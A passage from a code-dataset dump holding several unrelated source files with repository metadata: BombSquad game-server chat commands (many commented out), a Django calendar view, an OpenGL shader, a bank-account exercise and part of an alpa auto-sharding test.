ba.GameActivity)\n try:\n rs = [int(args[2])]\n ref_type = 'soft' if int(args[1]) == 0 else 'powerup'\n except (ValueError, IndexError):\n chatmessage(get_locale('chat_command_not_args_error'))\n return\n\n activity.map.node.reflection = ref_type\n activity.map.node.reflection_scale = rs\n\n try:\n activity.map.bg.reflection = ref_type\n activity.map.bg.reflection_scale = rs\n except AttributeError:\n pass\n\n try:\n activity.map.floor.reflection = ref_type\n activity.map.floor.reflection_scale = rs\n except AttributeError:\n pass\n\n try:\n activity.map.center.reflection = ref_type\n activity.map.center.reflection_scale = rs\n except AttributeError:\n pass\n\n\n@servercommand('shatter'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef shatter_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 3 or not args[2].isdigit():\n chatmessage(get_locale('chat_command_not_args_error'))\n else:\n level = int(args[2])\n if args[1] == 'all' and playerdata.status == Status.ADMIN:\n for i in activity.players:\n i.actor.node.shattered = level\n else:\n try:\n activity.players[int(args[0])].actor.node.shattered = level\n except (ValueError, IndexError):\n chatmessage(get_locale('not_player_error'))\n\n# ВНИМАНИЕ! ЗАКРОЙТЕ ГЛАЗА! 
тут говнокод\n# @servercommand(commands=('/cm',),\n# statuses=(Status.VIP, Status.ADMIN))\n# def cm_callback(playerdata: PlayerData, args):\n# if not args:\n# time = 10000\n# else:\n# time = int(args[0])\n#\n# op = 0.08\n# std = ba.getactivity().globalsnode.vignetteOuter\n# vignetteOuter = {\n# 0: ba.getactivity().globalsnode.vignetteOuter,\n# 17000: (0, 1, 0)\n# }\n#\n# ba.animateArray(ba.getactivity().globalsnode,\n# 'vignetteOuter', 3, vignetteOuter)\n#\n# try:\n# activity.map.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node1.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node2.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node3.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.steps.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.floor.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node4.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.center.opacity = op\n# except Exception:\n# pass\n#\n# def off():\n# op = 1\n# try:\n# activity.map.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node1.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node2.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node3.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node4.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.steps.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.floor.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.center.opacity = op\n# except Exception:\n# pass\n#\n# vignetteOuter = {\n# 0: ba.getactivity().globalsnode.vignetteOuter,\n# 100: std\n# }\n#\n# ba.animateArray(ba.getactivity().globalsnode,\n# 'vignetteOuter', 3, vignetteOuter)\n#\n# ba.timer(time, off)\n\n\n@servercommand('sleep'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef sleep_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if not args:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for i in activity.players:\n try:\n i.actor.node.handlemessage('knockout', 5000)\n except AttributeError:\n pass\n else:\n try:\n activity.players[int(args[1])].actor.node.handlemessage(\n 'knockout', 5000)\n except (ValueError, IndexError):\n chatmessage(get_locale('not_player_error'))\n except AttributeError:\n pass\n\n\n# @servercommand(commands=('/skin',),\n# statuses=(Status.VIP, Status.ADMIN))\n# def skin_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error'))\n# elif args[0] == 'names':\n# chatmessage(get_locale('skin_names_text'))\n# for msg in get_locale('skin_names'):\n# chatmessage(msg)\n# chatmessage(get_locale('dividing_strip_text'))\n# elif str(args[1]) in SKIN_NAMES:\n# account_id = activity.players[int(args[0])].get_account_id()\n# bd.server.custom_skins[account_id] = str(args[1])\n# elif str(args[1]) == 'reset':\n# account_id = activity.players[int(args[0])].get_account_id()\n# bd.server.custom_skins.pop(account_id, None)\n\n\n@servercommand('rainbow'.split(), {Status.VIP: 0, 
Status.ADMIN: 0})\ndef rainbow_callback(playerdata: PlayerData, args):\n color = {\n 0: (0, 0, 3), 0.5: (0, 3, 0),\n 1: (3, 0, 0), 1.5: (0, 0, 3)\n }\n\n highlight = {\n 0: (3, 0, 0), 0.5: (0, 0, 0),\n 1: (0, 0, 3), 1.5: (3, 0, 0)\n }\n\n def do_rainbow(player):\n if player and player.actor and player.actor.node:\n ba.animate_array(player.actor.node,\n 'color', 3, color, True)\n ba.animate_array(player.actor.node,\n 'highlight', 3, highlight, True)\n player.actor.node.handlemessage(\n 'celebrate', 6000)\n\n activity = ba.getactivity()\n\n if len(args) < 1:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all':\n for i in activity.players:\n do_rainbow(i)\n else:\n try:\n do_rainbow(activity.players[int(args[1])])\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n\n\n# commands handlers for admins\n@servercommand('restart'.split(), {Status.ADMIN: 0})\ndef restart_callback(playerdata: PlayerData, args):\n _ba.quit()\n\n\n# @servercommand(commands=('/freeze',),\n# statuses=(Status.ADMIN,))\n# def freeze_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.handlemessage(ba.FreezeMessage())\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.handlemessage(ba.FreezeMessage())\n# else:\n# activity.players[int(args[0])].actor.node.handlemessage(\n# ba.FreezeMessage())\n#\n#\n# @servercommand(commands=('/thaw',),\n# statuses=(Status.ADMIN,))\n# def thaw_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.handlemessage(ba.ThawMessage())\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.handlemessage(ba.ThawMessage())\n# else:\n# activity.players[int(args[0])].actor.node.handlemessage(\n# ba.ThawMessage())\n#\n#\n# @servercommand(commands=('/kill',),\n# statuses=(Status.ADMIN,))\n# def kill_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.handlemessage(ba.DieMessage())\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.handlemessage(ba.DieMessage())\n# else:\n# activity.players[int(args[0])].actor.node.handlemessage(\n# ba.DieMessage())\n#\n#\n# @servercommand(commands=('/curse',),\n# statuses=(Status.ADMIN,))\n# def curse_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.curse()\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.curse()\n# else:\n# activity.players[int(args[0])].actor.curse()\n#\n#\n# 
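# Editor's note — a generic, hedged sketch of the command-registry decorator pattern
# used throughout this module; the registry and Status enum below are simplified
# stand-ins chosen for illustration, not the project's real servercommand machinery.
from enum import Enum

class Status(Enum):
    ADMIN = 'admin'
    VIP = 'vip'

_handlers = []

def servercommand(commands, statuses):
    def wrap(func):
        func.commands = commands      # aliases, e.g. 'kick k'.split()
        func.statuses = statuses      # allowed Status -> cooldown in seconds
        _handlers.append(func)
        return func
    return wrap

@servercommand('ping'.split(), {Status.ADMIN: 0, Status.VIP: 10})
def ping(playerdata, args):
    return 'pong'

assert _handlers[-1].commands == ['ping']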
@servercommand(commands=('/gm',),\n# statuses=(Status.ADMIN,))\n# def gm_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# if not i.actor.node.hockey:\n# i.actor.node.hockey = True\n# else:\n# i.actor.node.hockey = False\n#\n# if not i.actor.node.invincible:\n# i.actor.node.invincible = True\n# else:\n# i.actor.node.invincible = False\n#\n# if i.actor._punchPowerScale == 1.2:\n# i.actor._punchPowerScale = 5\n# else:\n# i.actor._punchPowerScale = 1.2\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# if not i.actor.node.hockey:\n# i.actor.node.hockey = True\n# else:\n# i.actor.node.hockey = False\n#\n# if not i.actor.node.invincible:\n# i.actor.node.invincible = True\n# else:\n# i.actor.node.invincible = False\n#\n# if i.actor._punchPowerScale == 1.2:\n# i.actor._punchPowerScale = 5\n# else:\n# i.actor._punchPowerScale = 1.2\n# else:\n# if not activity.players[\n# int(args[0])].actor.node.hockey:\n# activity.players[\n# int(args[0])].actor.node.hockey = True\n# else:\n# activity.players[\n# int(args[0])].actor.node.hockey = False\n#\n# if not activity.players[\n# int(args[0])].actor.node.invincible:\n# activity.players[\n# int(args[0])].actor.node.invincible = True\n# else:\n# activity.players[\n# int(args[0])].actor.node.invincible = False\n#\n# if not activity.players[\n# int(args[0])].actor._punchPowerScale == 1.2:\n# activity.players[\n# int(args[0])].actor._punchPowerScale = 5\n# else:\n# activity.players[\n# int(args[0])].actor._punchPowerScale = 1.2\n#\n#\n# @servercommand(commands=('/pause',),\n# statuses=(Status.ADMIN,))\n# def pause_callback(playerdata: PlayerData, args):\n# if not ba.getactivity().globalsnode.paused:\n# ba.getactivity().globalsnode.paused = True\n# else:\n# ba.getactivity().globalsnode.paused = False\n#\n#\n# @servercommand(commands=('/cameraMode', '/cam'),\n# statuses=(Status.ADMIN,))\n# def camera_mode_callback(playerdata: PlayerData, args):\n# if ba.getactivity().globalsnode.cameraMode == 'follow':\n# ba.getactivity().globalsnode.cameraMode = 'rotate'\n# else:\n# ba.getactivity().globalsnode.cameraMode = 'follow'\n#\n#\n# @servercommand(commands=('/icy',),\n# statuses=(Status.ADMIN,))\n# def icy_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif len(args) >= 2:\n# activity.players[int(args[0])].actor.node = \\\n# activity.players[int(args[1])].actor.node\n#\n# activity.players[int(args[1])].actor.node = \\\n# activity.players[int(args[0])].actor.node\n#\n#\n# @servercommand(commands=('/maxPlayers', '/mp'),\n# statuses=(Status.ADMIN,))\n# def max_players_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# else:\n# activity._maxPlayers = int(args[0])\n# _ba._setPublicPartyMaxSize(int(args[0]))\n#\n#\n# @servercommand(commands=('/rise',),\n# statuses=(Status.ADMIN,))\n# def rise_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# activity.spawnPlayer(i)\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# 
False).encode('utf-8')\n#\n# if account_name == args[1]:\n# activity.spawnPlayer(i)\n# else:\n# activity.spawnPlayer(activity.players[int(args[0])])\n#\n#\n# @servercommand(commands=('/tnt',),\n# statuses=(Status.ADMIN,))\n# def tnt_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[2] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Bomb(bombType='tnt',\n# position=pos).autoRetain()\n# elif len(args) == 3:\n# ba.Bomb(bombType='tnt',\n# position=(float(args[0]),\n# float(args[1]),\n# float(args[2]))).autoRetain()\n#\n#\n# @servercommand(commands=('/bomb',),\n# statuses=(Status.ADMIN,))\n# def bomb_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'names':\n# chatmessage(get_locale('bomb_names_text')\n# send_chat_messages(get_locale('arg_bomb_options'))\n# chatmessage(get_locale('dividing_strip_text')\n# elif args[2] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Bomb(bombType=str(args[0]),\n# blastRadius=float(args[1]),\n# position=pos).autoRetain()\n# elif len(args) == 5:\n# ba.Bomb(bombType=str(args[0]),\n# blastRadius=float(args[1]),\n# position=(float(args[2]),\n# float(args[3]),\n# float(args[4]))).autoRetain()\n#\n#\n# @servercommand(commands=('/blast',),\n# statuses=(Status.ADMIN,))\n# def blast_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[1] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Blast(blastRadius=float(args[0]),\n# position=pos).autoRetain()\n# elif len(args) == 4:\n# ba.Blast(blastRadius=float(args[0]),\n# position=(float(args[1]),\n# float(args[2]),\n# float(args[3]))).autoRetain()\n#\n#\n# @servercommand(commands=('/powerup', '/bonus'),\n# statuses=(Status.ADMIN,))\n# def powerup_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'names':\n# chatmessage(get_locale('powerup_names_text')\n# send_chat_messages(get_locale('arg_powerup_options'))\n# chatmessage(get_locale('dividing_strip_text')\n# elif args[1] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Powerup(powerupType=str(args[0]),\n# position=pos).autoRetain()\n# elif len(args) == 4:\n# ba.Powerup(powerupType=str(args[0]),\n# position=(float(args[1]),\n# float(args[2]),\n# float(args[3]))).autoRetain()\n#\n#\n# @servercommand(commands=('/inv',),\n# statuses=(Status.ADMIN,))\n# def inv_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.name = ''\n# i.actor.node.colorTexture = None\n# i.actor.node.colorMaskTexture = None\n# i.actor.node.headModel = None\n# i.actor.node.torsoModel = None\n# i.actor.node.pelvisModel = None\n# i.actor.node.upperArmModel = None\n# i.actor.node.foreArmModel = None\n# i.actor.node.handModel = None\n# i.actor.node.upperLegModel = None\n# i.actor.node.lowerLegModel = None\n# i.actor.node.toesModel = None\n# i.actor.node.style = 'cyborg'\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = 
i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.name = ''\n# i.actor.node.colorTexture = None\n# i.actor.node.colorMaskTexture = None\n# i.actor.node.headModel = None\n# i.actor.node.torsoModel = None\n# i.actor.node.pelvisModel = None\n# i.actor.node.upperArmModel = None\n# i.actor.node.foreArmModel = None\n# i.actor.node.handModel = None\n# i.actor.node.upperLegModel = None\n# i.actor.node.lowerLegModel = None\n# i.actor.node.toesModel = None\n# i.actor.node.style = 'cyborg'\n# else:\n# t = activity.players[int(args[0])].actor.node\n# t.name = ''\n# t.colorTexture = None\n# t.colorMaskTexture = None\n# t.headModel = None\n# t.torsoModel = None\n# t.pelvisModel = None\n# t.upperArmModel = None\n# t.foreArmModel = None\n# t.handModel = None\n# t.upperLegModel = None\n# t.lowerLegModel = None\n# t.toesModel = None\n# t.style = 'cyborg'\n#\n#\n# @servercommand(commands=('/ban',),\n# statuses=(Status.ADMIN,))\n# def ban_callback(playerdata: PlayerData, args):\n# if len(args) < 2 or (args[0] == 'device' and len(args) < 3):\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'device':\n# for p in activity.players:\n# operator = None\n# account_id = None\n#\n# bd_server_player = bd.server.get_player('client_id',\n# client_id)\n# if 'id' in bd_server_player:\n# operator = bd_server_player['id']\n#\n# account_name = p.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# account_id = p.get_account_id()\n#\n# try:\n# end = args[3]\n# except IndexError:\n# end = None\n#\n# _ba._disconnectClient(p.sessionplayer.inputdevice.client_id())\n# if account_id is not None:\n# api.player.ban.add(\n# in_thread=True,\n# id=account_id,\n# reason=args[2],\n# operator=operator,\n# end=end)\n# else:\n# operator = \"CONSOLE\"\n# account_id = None\n#\n# bd_server_player = bd.server.get_player('client_id',\n# client_id)\n# if 'id' in bd_server_player:\n# operator = bd_server_player['id']\n#\n# account_id = activity.players[int(args[0])].get_account_id()\n#\n# try:\n# end = args[2]\n# except IndexError:\n# end = None\n#\n# _ba._disconnectClient(activity.players[int(args[0])].sessionplayer.inputdevice.client_id())\n# if account_id is not None:\n# api.player.ban.add(\n# in_thread=True,\n# id=account_id,\n# reason=args[1],\n# operator=operator,\n# end=end)\n#\n#\n# @servercommand(commands=['/fakekickvote', '/fkv'],\n# statuses=[Status.ADMIN])\n# def fakekickvote_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# else:\n# activity = _ba._getForegroundHostActivity()\n#\n# p = activity.players[int(args[0])]\n# device = p.sessionplayer.inputdevice\n# ba.screenMessage(get_format_locale('kickvote_start', name=p.get_name()), color=(1, 1, 0))\n# ba.screenMessage(get_format_locale('kickvote_type'), color=(1, 1, 0))\n# ba.screenMessage(get_format_locale('kickvote_needed_num', n='4'), color=(1, 1, 0))\n#\n# @servercommand(func=lambda m: check_message_for_team(m),\n# statuses=['anyone'])\n# def team_detect_callback(playerdata: PlayerData, args):\n# activity = _ba._getForegroundHostActivity()\n#\n# device = None\n# player = None\n# for p in activity.players:\n# if client_id == p.sessionplayer.inputdevice.client_id():\n# device = p.sessionplayer.inputdevice\n# player = p\n# break\n#\n# chatmessage(get_locale('team_warn', name=device.player.sessionplayer.get_name(),\n# 
account_id=player.get_account_id())\n","repo_name":"BombDash/BombDash-server","sub_path":"src/python/bd/chat/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":36078,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"26016107463","text":"# encoding: utf-8\n# from django.contrib.auth.decorators import login_required\nfrom datetime import datetime, timedelta\nfrom django.core.context_processors import csrf\nfrom django.http import Http404\nfrom django.shortcuts import render_to_response\nimport itertools\nfrom calendario.forms import SetupForm\n\n\n# @login_required\n# def setup(request):\n# form = SetupForm(initial={'semanas': 16, 'fecha_de_inicio': datetime.today()})\n# c = {'form': form}\n# c.update(csrf(request))\n# return render_to_response('setup.html', c)\n\n\ndef agrupar_clases_por_semana(clases, cantidad):\n clases_de_la_semana = tuple(itertools.islice(clases, cantidad))\n while clases_de_la_semana:\n yield clases_de_la_semana\n clases_de_la_semana = tuple(itertools.islice(clases, cantidad))\n\n\n# @login_required\ndef create(request):\n if request.method == \"POST\":\n form = SetupForm(request.POST)\n if form.is_valid():\n semanas = form.cleaned_data['semanas']\n fecha_de_inicio = form.cleaned_data['fecha_de_inicio']\n lunes_de_esa_semana = fecha_de_inicio + timedelta(days=-fecha_de_inicio.weekday())\n\n dias_de_clase = []\n # agrego los días de clase si los tildaron en el form.\n form.cleaned_data['lunes'] and dias_de_clase.append(0)\n form.cleaned_data['martes'] and dias_de_clase.append(1)\n form.cleaned_data['miercoles'] and dias_de_clase.append(2)\n form.cleaned_data['jueves'] and dias_de_clase.append(3)\n form.cleaned_data['viernes'] and dias_de_clase.append(4)\n form.cleaned_data['sabado'] and dias_de_clase.append(5)\n\n clases = (lunes_de_esa_semana + timedelta(s*7+d) for s in xrange(semanas) for d in dias_de_clase)\n clases_por_semana = len(dias_de_clase)\n clases = agrupar_clases_por_semana(clases, clases_por_semana)\n\n return render_to_response('create.html', {'clases': clases, 'clases_por_semana': clases_por_semana})\n else:\n c = {'form': form}\n c.update(csrf(request))\n return render_to_response('setup.html', c)\n else:\n raise Http404\n","repo_name":"gsorianob/materias","sub_path":"calendario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71095273432","text":"import math\nfrom OpenGL.GL import *\n\nRESOLUTION = 15\n\nclass Shader:\n def __init__(self, radius, background_color):\n self._radius = radius\n self._background_color = background_color\n self._display_list_id = None\n\n def render(self, x, y, z):\n if self._display_list_id is None:\n self._display_list_id = self._create_display_list()\n glPushMatrix()\n glTranslatef(x, y, z)\n glCallList(self._display_list_id)\n glPopMatrix()\n \n def _create_display_list(self):\n bg_r, bg_g, bg_b, bg_a = self._background_color\n angle_increment = 2 * math.pi / RESOLUTION\n display_list_id = glGenLists(1)\n glNewList(display_list_id, GL_COMPILE)\n glBegin(GL_TRIANGLE_FAN)\n glColor4f(bg_r, bg_g, bg_b, 0)\n glVertex3f(0, 0, 0)\n glColor4f(bg_r, bg_g, bg_b, 1)\n for i in range(RESOLUTION):\n angle1 = angle_increment * i\n angle2 = angle_increment * (i+1)\n glVertex3f(math.cos(angle1) * self._radius, 0, math.sin(angle1) * self._radius)\n glVertex3f(math.cos(angle2) * self._radius, 0, math.sin(angle2) * 
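# Editor's note — a runnable distillation of the islice-based week grouping defined in
# the calendario views above; the date range is invented for the demo.
import itertools
from datetime import date, timedelta

def group_by_week(days, per_week):
    days = iter(days)
    week = tuple(itertools.islice(days, per_week))
    while week:
        yield week
        week = tuple(itertools.islice(days, per_week))

classes = (date(2024, 1, 1) + timedelta(d) for d in range(6))
weeks = list(group_by_week(classes, 3))
assert len(weeks) == 2 and len(weeks[0]) == 3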
self._radius)\n glEnd()\n glEndList()\n return display_list_id\n","repo_name":"gaborpapp/AIam","sub_path":"movement_ai/ui/shader.py","file_name":"shader.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19156373434","text":"class BankAccount:\n def acc(self,name,acc,savings):\n self.name=name\n self.acc=acc\n self.savings=savings\n def deposit(self,d):\n self.savings=self.savings+d\n def withdraw(self,w):\n self.savings=self.savings-w\n def display(self):\n print(\"NAME:\",self.name)\n print(\"Account No.:\",self.acc)\n print(\"Account Balance:\",self.savings)\nb1= BankAccount()\nb1.acc(\"Divyam\",199930062000,98000)\nch=''\nwhile(ch!=5):\n print(\"MAIN MENU\")\n print(\"1.DEPOSIT\")\n print(\"2.WITHDRAW\")\n print(\"3.BALANCE EQUERY\")\n print(\"4.EXIT\")\n ch=int(input())\n if ch==1:\n d=int(input())\n b1.deposit(d)\n if ch==2:\n w=int(input())\n b1.withdraw(w)\n if ch==3:\n b1.display()\n if ch==4:\n break\n ","repo_name":"NehaMuskan/5th_Semester_Python","sub_path":"Assignment-10/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29825373431","text":"\"\"\"Test auto sharding with convolution nets.\"\"\"\n\nimport unittest\nfrom typing import Any\n\nfrom flax import linen as nn\nfrom flax.training import train_state, dynamic_scale as dynamic_scale_lib\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nimport optax\n\nfrom alpa import parallelize, ShardParallel, LocalPhysicalDeviceMesh, AutoShardingOption\nfrom alpa.util import map_to_shape, count_communication_primitives\n\nfrom tests.shard_parallel.test_mlp import assert_close, assert_all_replicated, is_sharded\n\n\nclass TrainState(train_state.TrainState):\n batch_stats: Any\n dynamic_scale: dynamic_scale_lib.DynamicScale\n\n\ndef assert_data_parallel_cost(state,\n hlo_ir,\n objective,\n device_mesh,\n as_option,\n mesh_dim,\n allow_not_sharded_params=0):\n params = jax.tree_util.tree_leaves(state.params)\n opt_state = jax.tree_util.tree_leaves(state.opt_state)\n batch_stats = jax.tree_util.tree_leaves(state.batch_stats)\n\n # Check communication cost\n replicated_penalty = int(\n device_mesh.all_reduce_cost(1, 0) + device_mesh.all_reduce_cost(1, 1))\n weight_sync = sum(\n device_mesh.all_reduce_cost(np.prod(x.shape) * 4, mesh_dim) +\n replicated_penalty for x in params)\n num_batch_norm = len(batch_stats) // 2\n batch_norm_sync = 2 * sum(\n device_mesh.all_reduce_cost(np.prod(x.shape) * 4, mesh_dim) +\n replicated_penalty for x in batch_stats)\n expected = weight_sync + batch_norm_sync\n\n assert_close(objective, expected, atol=0.05)\n\n # Check numbers of communication primitives\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (\n count_communication_primitives(hlo_ir, ignore_scalar_all_reduce=True))\n\n if as_option.prefer_reduce_scatter:\n assert n_all_reduce == num_batch_norm * 2\n assert n_reduce_scatter > 0\n assert n_all_gather <= 2\n assert n_total == n_all_reduce + n_reduce_scatter + n_all_gather\n else:\n assert n_all_reduce == 1 + num_batch_norm * 2\n assert n_total == n_all_reduce\n\n if as_option.prefer_reduce_scatter:\n num_not_sharded = 0\n for weight in opt_state:\n if not is_sharded(weight) and len(weight.shape) > 1:\n num_not_sharded += 1\n assert num_not_sharded == 0\n else:\n for weight in params:\n assert_all_replicated(weight, np.prod(device_mesh.shape))\n\n\nclass 
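# Editor's note — the BankAccount class above initialises itself through a method named
# acc that is then shadowed by the attribute assignment self.acc = acc, so it works only
# once. A conventional __init__ avoids the shadowing; this is a hedged rewrite for
# illustration, not the original assignment's required interface.
class BankAccount:
    def __init__(self, name, acc_no, savings):
        self.name = name
        self.acc_no = acc_no      # renamed so no method is shadowed
        self.savings = savings

    def deposit(self, amount):
        self.savings += amount

    def withdraw(self, amount):
        self.savings -= amount

b1 = BankAccount("Divyam", 199930062000, 98000)
b1.deposit(1000)
assert b1.savings == 99000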
AutoShardingConvTest(unittest.TestCase):\n\n def setUp(self):\n assert len(jax.local_devices()) >= 4\n self.physical_mesh = LocalPhysicalDeviceMesh(jax.local_devices()[:4])\n self.as_option = AutoShardingOption()\n\n def get_device_mesh(self, shape, mesh_alpha, mesh_beta):\n return self.physical_mesh.get_logical_mesh(shape, mesh_alpha, mesh_beta)\n\n def run_n_layer_conv(self,\n num_layers,\n batch_size,\n image_size,\n channel,\n device_mesh,\n use_bias=False,\n is_depthwise=False):\n if not is_depthwise:\n\n class Model(nn.Module):\n\n @nn.compact\n def __call__(self, x, train=True):\n for i in range(num_layers):\n x = nn.Conv(features=channel,\n kernel_size=(3, 3),\n strides=(2, 2),\n use_bias=use_bias)(x)\n x = nn.BatchNorm(use_running_average=not train)(x)\n x = nn.relu(x)\n x = nn.max_pool(x,\n window_shape=(2, 2),\n strides=(1, 1),\n padding=\"SAME\")\n return x\n\n x = jnp.ones((batch_size, image_size, image_size, channel))\n out_image_size = image_size // (2**num_layers)\n y = jnp.ones((batch_size, out_image_size, out_image_size, channel))\n else:\n\n class Model(nn.Module):\n\n @nn.compact\n def __call__(self, x, train=True):\n x = nn.Conv(features=8 * channel,\n kernel_size=(3, 3),\n strides=(1, 1),\n use_bias=use_bias)(x)\n x = nn.Conv(features=8 * channel,\n kernel_size=(3, 3),\n strides=(1, 1),\n feature_group_count=8 * channel,\n use_bias=use_bias)(x)\n x = nn.Conv(features=channel,\n kernel_size=(3, 3),\n strides=(1, 1),\n use_bias=use_bias)(x)\n x = nn.relu(x)\n x = nn.BatchNorm(use_running_average=not train)(x)\n return x\n\n x = jnp.ones((batch_size, image_size, image_size, channel))\n y = jnp.ones((batch_size, image_size, image_size, channel))\n\n @parallelize(method=ShardParallel(devices=device_mesh,\n auto_sharding_option=self.as_option))\n def train_step(state, batch):\n\n def loss_func(params):\n out, new_model_state = state.apply_fn(\n {\n \"params\": params,\n \"batch_stats\": state.batch_stats\n },\n batch[\"x\"],\n mutable=['batch_stats'])\n loss = jnp.mean((out - batch[\"y\"])**2)\n return loss, new_model_state\n\n grads, new_model_state = jax.grad(loss_func,\n has_aux=True)(state.params)\n new_state = state.apply_gradients(\n grads=grads, batch_stats=new_model_state['batch_stats'])\n return new_state\n\n # Init train state\n model = Model()\n rngkey = jax.random.PRNGKey(0)\n params = model.init(rngkey, x)\n tx = optax.sgd(0.1, momentum=0.9)\n state = TrainState.create(apply_fn=model.apply,\n params=params[\"params\"],\n tx=tx,\n batch_stats=params[\"batch_stats\"],\n dynamic_scale=None)\n\n # JIT compile\n state = train_step(state, {\"x\": x, \"y\": y})\n\n # Get optimized HLO IR\n executable = train_step.get_last_executable()\n return (state, executable.get_hlo_text(),\n executable.auto_sharding_objective)\n\n def test_n_layer_conv_data_parallel(self):\n batch_size = 16\n image_size = 16\n num_layers = 3\n channel = 4\n\n # Test on different device 